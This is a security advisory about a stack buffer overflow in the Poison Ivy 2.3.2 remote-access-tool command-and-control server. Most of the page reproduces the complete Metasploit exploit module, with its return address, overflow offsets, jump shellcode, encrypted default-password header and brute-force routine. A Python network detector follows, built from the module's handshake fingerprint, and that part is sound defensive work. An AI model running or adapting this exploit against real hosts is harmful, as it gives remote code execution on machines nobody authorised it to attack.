Poison Ivy 'C&C' Server Buffer Overflow Vulnerability

Source: Internet
Author: User


Affected Systems:
Poison Ivy 2.3.2
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54339

Poison Ivy is a remote management tool.

Poison Ivy 2.3.2 has a stack buffer overflow vulnerability. Attackers can exploit this vulnerability to execute arbitrary code in affected applications.

<* Source: Metasploit *>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!

Metasploit (http://metasploit.com/) provides the following test method:


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Brute

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Poison Ivy 2.3.2 C&C Server Buffer Overflow",
      'Description'    => %q{
          This module exploits a stack buffer overflow in Poison Ivy 2.3.2 C&C server.
        The exploit does not need to know the password chosen for the bot/server
        communication. If the C&C is configured with the default 'admin' password,
        the exploit should work fine. In case of the C&C configured with another
        password the exploit can fail. The 'check' command can be used to determine
        if the C&C target is using the default 'admin' password.

        Hopefully an exploit try won't crash the Poison Ivy C&C process, just the thread
        responsible for handling the connection. Because of this, the module provides
        the RANDHEADER option and a bruteforce target. If RANDHEADER is used a random header
        will be used. If the bruteforce target is selected, a random header will be sent in
        case the default for the password 'admin' doesn't work. Bruteforce will stop after
        5 tries or a session obtained.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Andrzej Dereszowski', # Vulnerability Discovery
          'Gal Badishi',         # Exploit and Metasploit module
          'juan vazquez'         # Testing and little of Metasploit-fu
        ],
      'References'     =>
        [
          [ 'URL', 'http://www.signal11.eu/en/research/articles/targeted_2010.pdf' ],
          [ 'URL', 'http://badishi.com/own-and-you-shall-be-owned' ]
        ],
      'DisclosureDate' => "Jun 24 2012",
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'StackAdjustment' => -4000,
          'Space'           => 10000,
          'BadChars'        => "",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Poison Ivy 2.3.2 / Windows XP SP3 / Windows 7 SP1',
            {
              'Ret'           => 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe"
              'RWAddress'     => 0x00401000,
              'Offset'        => 0x806D,
              'PayloadOffset' => 0x75,
              'jmpPayload'    => "\x81\xec\x00\x80\x00\x00\xff\xe4" # sub esp, 0x8000 # jmp esp
            }
          ],
          [ 'Poison Ivy 2.3.2 - Bruteforce / Windows XP SP3 / Windows 7 SP1',
            {
              'Ret'           => 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe"
              'RWAddress'     => 0x00401000,
              'Offset'        => 0x806D,
              'PayloadOffset' => 0x75,
              'jmpPayload'    => "\x81\xec\x00\x80\x00\x00\xff\xe4", # sub esp, 0x8000 # jmp esp
              'Bruteforce'    =>
                {
                  'Start' => { 'Try' => 1 },
                  'Stop'  => { 'Try' => 6 },
                  'Step'  => 1,
                  'Delay' => 2
                }
            }
          ],
        ],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RPORT(3460),
        OptBool.new('RANDHEADER', [ true, 'Send random bytes as the header', false ])
      ], self.class)

    register_advanced_options(
      [
        OptInt.new('BruteWait', [ false, "Delay between brute force attempts", 2 ]),
      ], self.class)
  end

  def check
    # First 16 bytes the server returns for an all-zero challenge when the password is 'admin'
    sig = "\x35\xe1\x06\x6c\xcd\x15\x87\x3e\xee\xf8\x51\x89\x66\xb7\x0f\x8b"
    # Length word a 2.3.2 server sends after the 256-byte challenge response
    lensig = [0x000015D0].pack("V")

    connect
    sock.put("\x00" * 256)
    response = sock.read(256)
    datalen = sock.read(4)
    disconnect

    if datalen == lensig
      if response[0,16] == sig
        print_status("Password appears to be \"admin\"")
      else
        print_status("Unknown password - Bruteforce target or RANDHEADER can be tried and exploit launched until success.")
      end
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def single_exploit
    if datastore['RANDHEADER'] == true
      # Generate a random header - allows multiple invocations of the exploit if it fails because we don't know the password
      header = rand_text(0x20)
    else
      # This is the 32-byte header we want to send, encrypted with the default password ("admin")
      # We have a very good chance of succeeding even if the password was changed
      header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7"
    end
    do_exploit(header)
  end

  def brute_exploit(brute_target)
    if brute_target['Try'] == 1
      print_status("Bruteforcing - Try #{brute_target['Try']}: Header for 'admin' password")
      # This is the 32-byte header we want to send, encrypted with the default password ("admin")
      # We have a very good chance of succeeding even if the password was changed
      header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7"
    else
      print_status("Bruteforcing - Try #{brute_target['Try']}: Random Header")
      # Generate a random header - allows multiple invocations of the exploit if it fails because we don't know the password
      header = rand_text(0x20)
    end
    do_exploit(header)
  end

  def do_exploit(header)
    # Handshake
    connect
    print_status("Performing handshake...")
    sock.put("\x00" * 256)
    sock.get

    # Don't change the nulls, or it might not work
    xploit = ''
    xploit << header
    xploit << "\x00" * (target['PayloadOffset'] - xploit.length)
    xploit << payload.encoded
    xploit << "\x00" * (target['Offset'] - xploit.length)
    xploit << [target.ret].pack("V") # ret to a jmp esp opcode
    xploit << [target['RWAddress']].pack("V") # Readable/writeable - will be cleaned by original ret 4 (esp will point to the next dword)
    xploit << target['jmpPayload'] # This comes immediately after ret - it is a setup for the payload (jmp back)

    # The disconnection triggers the exploit
    print_status("Sending exploit...")
    sock.put(xploit)
    select(nil, nil, nil, 5)
    disconnect
  end

end

=begin

* ROP version of exploit (): Has been discarded at the moment because of two reasons:

(1) Poison Ivy fails to run on DEP enabled systems (maybe due to the unpacking process)
(2) When trying an unpacked version on DEP enabled systems windows/exec payload runs, but not meterpreter

=end
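The module's check() and do_exploit() routines describe a wire fingerprint a defender can turn into a passive detection: a 256-byte client opener, a server reply of 256 challenge bytes followed by the little-endian length word 0x15D0, the 16-byte reply prefix that the default 'admin' password produces for an all-zero challenge, and a follow-up client message long enough to reach the overflow offset 0x806D. The following detector is an added example written for this advisory, not code from the Metasploit module or the Poison Ivy vendor. It assumes a sensor has already reassembled each TCP conversation into ordered client and server messages (the Flow class and the sample traffic are constructed here); the constants are the ones the module itself uses.

```python
import struct
from dataclasses import dataclass, field
from typing import List

# Values lifted from the module's check() and target table.
PI_DEFAULT_PORT = 3460
NULL_CHALLENGE = b"\x00" * 256                                  # sock.put("\x00" * 256)
ADMIN_SIG = bytes.fromhex("35e1066ccd15873eeef8518966b70f8b")   # sig in check()
LEN_SIG = struct.pack("<I", 0x15D0)                             # [0x000015D0].pack("V")
OVERFLOW_OFFSET = 0x806D                                        # target['Offset']


@dataclass
class Flow:
    """One reassembled TCP conversation (constructed for this example)."""
    client: str
    server: str
    dport: int
    client_msgs: List[bytes] = field(default_factory=list)
    server_msgs: List[bytes] = field(default_factory=list)


def classify(flow: Flow) -> List[str]:
    """Return the indicator names this flow matches, in a fixed order."""
    findings: List[str] = []
    if not flow.client_msgs:
        return findings
    first = flow.client_msgs[0]
    reply = flow.server_msgs[0] if flow.server_msgs else b""

    # Any 256-byte opener answered with 256 bytes plus the 0x15D0 length
    # word is the 2.3.2 server fingerprint that check() keys on.
    server_is_232 = (len(first) == 256 and len(reply) >= 260
                     and reply[256:260] == LEN_SIG)
    if server_is_232:
        findings.append("pi_232_server")

    # The module always opens with 256 null bytes; that exact opener is the
    # scan/exploit fingerprint, and only for it does the admin signature apply.
    if first == NULL_CHALLENGE:
        findings.append("msf_null_challenge")
        if server_is_232 and reply[:16] == ADMIN_SIG:
            findings.append("pi_default_admin_password")

    # The overflow needs the second client message to reach Offset bytes.
    if len(flow.client_msgs) > 1 and len(flow.client_msgs[1]) >= OVERFLOW_OFFSET:
        findings.append("overflow_sized_message")
    return findings


def sample_flows() -> List[Flow]:
    """Constructed traffic: a check() against a default-password server, an
    exploit attempt against a server with a changed password, and plain HTTP."""
    admin_reply = ADMIN_SIG + b"\xaa" * 240 + LEN_SIG
    other_reply = b"\xbb" * 256 + LEN_SIG
    return [
        Flow("10.0.0.5", "10.0.0.9", PI_DEFAULT_PORT, [NULL_CHALLENGE], [admin_reply]),
        Flow("10.0.0.6", "10.0.0.9", PI_DEFAULT_PORT,
             [NULL_CHALLENGE, b"\x00" * (OVERFLOW_OFFSET + 16)], [other_reply]),
        Flow("10.0.0.7", "10.0.0.10", 80,
             [b"GET / HTTP/1.1\r\n\r\n"], [b"HTTP/1.1 200 OK\r\n\r\n"]),
    ]


if __name__ == "__main__":
    for f in sample_flows():
        print(f"{f.client} -> {f.server}:{f.dport}: {classify(f) or 'no indicators'}")
```

The server fingerprint is evaluated for any 256-byte opener, not only the all-zero one, because the length word is a property of the 2.3.2 server rather than of the module; the 'admin' signature is only checked after a null challenge, since that is the plaintext it was derived from. An oversized second message is reported on its own so that an attempt with RANDHEADER or the bruteforce target, where the admin prefix never appears, is still caught.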

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Poison Ivy
----------
Currently, the vendor does not provide patches or upgrades. Users of the software are advised to check the vendor's homepage for the latest version:

http://www.poisonivy-rat.com/index.php
